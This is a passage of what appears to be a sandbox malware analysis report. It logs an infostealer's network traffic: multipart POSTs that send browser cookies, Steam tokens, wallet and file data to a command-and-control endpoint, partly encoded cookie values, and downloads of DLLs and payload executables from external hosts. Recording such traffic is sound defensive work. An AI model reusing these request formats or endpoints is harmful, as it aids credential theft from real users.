0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 44 41 45 43 41 45 43 46 43 41 41 45 42 46 48 49 45 48 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 56 46 4a 56 52 51 6b 76 43 55 5a 42 54 46 4e 46 43 54 45 32 4f 54 6b 77 4d 54 45 32 4d 54 55 4a 4d 56 42 66 53 6b 46 53 43 54 49 77 4d 6a 4d 74 4d 54 41 74 4d 44 51 74 4d 54 4d 4b 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 45 79 4d 6a 4d 77 4f 44 45 31 43 55 35 4a 52 41 6b 31 4d 54 45 39 52 57 59 31 64 6c 42 47 52 33 63 74 54 56 70 5a 62 7a 56 6f 64 32 55 74 4d 46 52 6f 51 56 5a 7a 62 47 4a 34 59 6d 31 32 5a 46 5a 61 64 32 4e 49 62 6e 46 57 65 6c 64 49 51 56 55 78 4e 48 59 31 4d 30 31 4f 4d 56 5a 32 64 33 5a 52 63 54 68 69 59 56 6c 6d 5a 7a 49 74 53 55 46 30 63 56 70 43 56 6a 56 4f 54 30 77 31 63 6e 5a 71 4d 6b 35 58 53 58 46 79 65 6a 4d 33 4e 31 56 6f 54 47 52 49 64 45 39 6e 52 53 31 30 53 6d 46 43 62 46 56 43 57 55 70 46 61 48 56 48 63 31 46 6b 63 57 35 70 4d 32 39 55 53 6d 63 77 59 6e 4a 78 64 6a 46 6b 61 6d 52 70 54 45 70 35 64 6c 52 54 56 57 68 6b 53 79 31 6a 4e 55 70 58 59 57 52 44 55 33 4e 56 54 46 42 4d 65 6d 68 54 65 43 31 47 4c 54 5a 33 54 32 63 30 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 44 41 45 43 41 45 43 46 43 41 41 45 42 46 48 49 45 48 44 47 2d 2d 0d 0a Data Ascii: ------DAECAECFCAAEBFHIEHDGContent-Disposition: form-data; name="token"934c362f2345b38ae43488aec06acd1e5e9921e088cc906315950e2729657ad6775bff99------DAECAECFCAAEBFHIEHDGContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------DAECAECFCAAEBFHIEHDGContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JVFJVRQkvCUZBTFNFCTE2OTkwMTE2MTUJMVBfSkFSCTIwMjMtMTAtMDQtMTMKLmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjMwODE1CU5JRAk1MTE9RWY1dlBGR3ctTVpZbzVod2UtMFRoQVZzbGJ4Y
                            Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGDAKEHIIDGDAAKECBFBHost: 185.172.128.76Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 47 44 41 4b 45 48 49 49 44 47 44 41 41 4b 45 43 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 33 34 63 33 36 32 66 32 33 34 35 62 33 38 61 65 34 33 34 38 38 61 65 63 30 36 61 63 64 31 65 35 65 39 39 32 31 65 30 38 38 63 63 39 30 36 33 31 35 39 35 30 65 32 37 32 39 36 35 37 61 64 36 37 37 35 62 66 66 39 39 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 41 4b 45 48 49 49 44 47 44 41 41 4b 45 43 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 4e 54 45 35 4d 54 6b 78 4f 44 67 31 4c 6d 5a 70 62 47 55 3d 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 41 4b 45 48 49 49 44 47 44 41 41 4b 45 43 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 41 4b 45 48 49 49 44 47 44 41 41 4b 45 43 42 46 42 2d 2d 0d 0a Data Ascii: ------BGDAKEHIIDGDAAKECBFBContent-Disposition: form-data; name="token"934c362f2345b38ae43488aec06acd1e5e9921e088cc906315950e2729657ad6775bff99------BGDAKEHIIDGDAAKECBFBContent-Disposition: form-data; name="file_name"NTE5MTkxODg1LmZpbGU=------BGDAKEHIIDGDAAKECBFBContent-Disposition: form-data; name="file"------BGDAKEHIIDGDAAKECBFB--
                            Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDHDGIEHJJJJEBGDAFHJHost: 185.172.128.76Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 44 48 44 47 49 45 48 4a 4a 4a 4a 45 42 47 44 41 46 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 33 34 63 33 36 32 66 32 33 34 35 62 33 38 61 65 34 33 34 38 38 61 65 63 30 36 61 63 64 31 65 35 65 39 39 32 31 65 30 38 38 63 63 39 30 36 33 31 35 39 35 30 65 32 37 32 39 36 35 37 61 64 36 37 37 35 62 66 66 39 39 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 44 47 49 45 48 4a 4a 4a 4a 45 42 47 44 41 46 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 4e 54 45 35 4d 54 6b 78 4f 44 67 31 4c 6d 5a 70 62 47 55 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 44 47 49 45 48 4a 4a 4a 4a 45 42 47 44 41 46 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 44 47 49 45 48 4a 4a 4a 4a 45 42 47 44 41 46 48 4a 2d 2d 0d 0a Data Ascii: ------IDHDGIEHJJJJEBGDAFHJContent-Disposition: form-data; name="token"934c362f2345b38ae43488aec06acd1e5e9921e088cc906315950e2729657ad6775bff99------IDHDGIEHJJJJEBGDAFHJContent-Disposition: form-data; name="file_name"NTE5MTkxODg1LmZpbGU=------IDHDGIEHJJJJEBGDAFHJContent-Disposition: form-data; name="file"------IDHDGIEHJJJJEBGDAFHJ--
                            Source: global trafficHTTP traffic detected: GET /15f649199f40275b/freebl3.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /15f649199f40275b/mozglue.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /15f649199f40275b/msvcp140.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /15f649199f40275b/nss3.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /15f649199f40275b/softokn3.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /15f649199f40275b/vcruntime140.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JEGHJKFHJJJKJJJJKEHCHost: 185.172.128.76Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BFHDHJKKJDHJJJJKEGHIHost: 185.172.128.76Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 46 48 44 48 4a 4b 4b 4a 44 48 4a 4a 4a 4a 4b 45 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 33 34 63 33 36 32 66 32 33 34 35 62 33 38 61 65 34 33 34 38 38 61 65 63 30 36 61 63 64 31 65 35 65 39 39 32 31 65 30 38 38 63 63 39 30 36 33 31 35 39 35 30 65 32 37 32 39 36 35 37 61 64 36 37 37 35 62 66 66 39 39 0d 0a 2d 2d 2d 2d 2d 2d 42 46 48 44 48 4a 4b 4b 4a 44 48 4a 4a 4a 4a 4b 45 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 42 46 48 44 48 4a 4b 4b 4a 44 48 4a 4a 4a 4a 4b 45 47 48 49 2d 2d 0d 0a Data Ascii: ------BFHDHJKKJDHJJJJKEGHIContent-Disposition: form-data; name="token"934c362f2345b38ae43488aec06acd1e5e9921e088cc906315950e2729657ad6775bff99------BFHDHJKKJDHJJJJKEGHIContent-Disposition: form-data; name="message"wallets------BFHDHJKKJDHJJJJKEGHI--
                            Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAECAECFCAAEBFHIEHDGHost: 185.172.128.76Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 41 45 43 41 45 43 46 43 41 41 45 42 46 48 49 45 48 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 33 34 63 33 36 32 66 32 33 34 35 62 33 38 61 65 34 33 34 38 38 61 65 63 30 36 61 63 64 31 65 35 65 39 39 32 31 65 30 38 38 63 63 39 30 36 33 31 35 39 35 30 65 32 37 32 39 36 35 37 61 64 36 37 37 35 62 66 66 39 39 0d 0a 2d 2d 2d 2d 2d 2d 44 41 45 43 41 45 43 46 43 41 41 45 42 46 48 49 45 48 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 44 41 45 43 41 45 43 46 43 41 41 45 42 46 48 49 45 48 44 47 2d 2d 0d 0a Data Ascii: ------DAECAECFCAAEBFHIEHDGContent-Disposition: form-data; name="token"934c362f2345b38ae43488aec06acd1e5e9921e088cc906315950e2729657ad6775bff99------DAECAECFCAAEBFHIEHDGContent-Disposition: form-data; name="message"files------DAECAECFCAAEBFHIEHDG--
                            Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EBFBKKJECAKEHJJJDBAFHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDHCGDAFBKFIDHJJJDHCHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJKFBFIJJECGCAAAFCBGHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGDAKEHIIDGDAAKECBFBHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JKJKKKJJJKJKFHJJJJECHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KEHCAFHIJECGCAKFCGDBHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FHCAFIDBKEBFCBFIIIIIHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JKJKKKJJJKJKFHJJJJECHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KEHCAFHIJECGCAKFCGDBHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FHCAFIDBKEBFCBFIIIIIHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EBAKFIIJJKJJJJJJEGDAHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KEHCAFHIJECGCAKFCGDBHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CGHCFBAAAFHJDGCBFIIJHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAEGCGCGIEGDHIDHJJEHHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CGIEBAFHJJDBGCAKJJKFHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFHDBFIEGIDGIECBKJECHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIDGDAKFHIEHJKFHDHDBHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CGHCFBAAAFHJDGCBFIIJHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDAAFBGDBKJJJKFIIIJJHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JEGHJKFHJJJKJJJJKEHCHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIDBKKKKKFBGDGDHIDBGHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDGCGHIJKEGIECBFCBAEHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJJECGHJDBFIJJJKEHCBHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BFBGCFCFHCFHIECAEHDHHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DHCGIDHDAKJECBFHCBAAHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CBAFIDAECBGCBFHJEBGDHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDAAFBGDBKJJJKFIIIJJHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AAEHJEGIIDAECAAKEBKFHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CBAFIDAECBGCBFHJEBGDHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIJJKECFCFBGDHIECAAFHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIEHDBGDHDAECBGDHJKFHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HJJEGCAAECBFIEBGHJDGHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIJJKECFCFBGDHIECAAFHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIEHDBGDHDAECBGDHJKFHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAAAKFHIEGDGCAAAEGDGHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIEHDHCFIJDBFHJJDBFHHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDAAFBGDBKJJJKFIIIJJHost: 185.172.128.76Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 44 41 41 46 42 47 44 42 4b 4a 4a 4a 4b 46 49 49 49 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 33 34 63 33 36 32 66 32 33 34 35 62 33 38 61 65 34 33 34 38 38 61 65 63 30 36 61 63 64 31 65 35 65 39 39 32 31 65 30 38 38 63 63 39 30 36 33 31 35 39 35 30 65 32 37 32 39 36 35 37 61 64 36 37 37 35 62 66 66 39 39 0d 0a 2d 2d 2d 2d 2d 2d 49 44 41 41 46 42 47 44 42 4b 4a 4a 4a 4b 46 49 49 49 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 44 41 41 46 42 47 44 42 4b 4a 4a 4a 4b 46 49 49 49 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 49 44 41 41 46 42 47 44 42 4b 4a 4a 4a 4b 46 49 49 49 4a 4a 2d 2d 0d 0a Data Ascii: ------IDAAFBGDBKJJJKFIIIJJContent-Disposition: form-data; name="token"934c362f2345b38ae43488aec06acd1e5e9921e088cc906315950e2729657ad6775bff99------IDAAFBGDBKJJJKFIIIJJContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------IDAAFBGDBKJJJKFIIIJJContent-Disposition: form-data; name="file"------IDAAFBGDBKJJJKFIIIJJ--
                            Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIJEBFCFIJJJEBGDBAKEHost: 185.172.128.76Content-Length: 127543Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKECAEBGHDAEBFHIEGHIHost: 185.172.128.76Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 4b 45 43 41 45 42 47 48 44 41 45 42 46 48 49 45 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 33 34 63 33 36 32 66 32 33 34 35 62 33 38 61 65 34 33 34 38 38 61 65 63 30 36 61 63 64 31 65 35 65 39 39 32 31 65 30 38 38 63 63 39 30 36 33 31 35 39 35 30 65 32 37 32 39 36 35 37 61 64 36 37 37 35 62 66 66 39 39 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 45 43 41 45 42 47 48 44 41 45 42 46 48 49 45 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 31 38 31 38 31 36 36 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 45 43 41 45 42 47 48 44 41 45 42 46 48 49 45 47 48 49 2d 2d 0d 0a Data Ascii: ------BKECAEBGHDAEBFHIEGHIContent-Disposition: form-data; name="token"934c362f2345b38ae43488aec06acd1e5e9921e088cc906315950e2729657ad6775bff99------BKECAEBGHDAEBFHIEGHIContent-Disposition: form-data; name="message"1818166------BKECAEBGHDAEBFHIEGHI--
                            Source: Joe Sandbox ViewIP Address: 185.172.128.90 185.172.128.90
                            Source: Joe Sandbox ViewIP Address: 185.172.128.228 185.172.128.228
                            Source: Joe Sandbox ViewASN Name: NADYMSS-ASRU NADYMSS-ASRU
                            Source: Joe Sandbox ViewASN Name: PINDC-ASRU PINDC-ASRU
                            Source: Joe Sandbox ViewJA3 fingerprint: 1138de370e523e824bbca92d049a3777
                            Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
                            Source: global trafficHTTP traffic detected: GET /cpa/ping.php?substr=eight&s=ab&sub=0 HTTP/1.1Host: 185.172.128.90User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
                            Source: global trafficHTTP traffic detected: GET /ping.php?substr=eight HTTP/1.1Host: 185.172.128.228User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
                            Source: global trafficHTTP traffic detected: GET /syncUpd.exe HTTP/1.1Host: 185.172.128.59User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
                            Source: global trafficHTTP traffic detected: GET /1/Qg_Appv5.exe HTTP/1.1Host: note.padd.cn.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
                            Source: global trafficHTTP traffic detected: GET /BroomSetup.exe HTTP/1.1Host: 185.172.128.228User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
                            Source: global trafficHTTP traffic detected: POST /__svc/sbv/DownloadManager.ashx HTTP/1.0Connection: keep-aliveContent-Length: 300Host: svc.iolo.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: identityUser-Agent: Mozilla/3.0 (compatible; Indy Library)
                            Source: global trafficHTTP traffic detected: POST /__svc/sbv/DownloadManager.ashx HTTP/1.0Connection: keep-aliveContent-Length: 300Host: svc.iolo.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: identityUser-Agent: Mozilla/3.0 (compatible; Indy Library)
                            Source: unknownHTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49716 version: TLS 1.0
                            Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                            Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                            Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.90
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.90
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.90
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.90
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.228
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.228
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.228
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.228
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
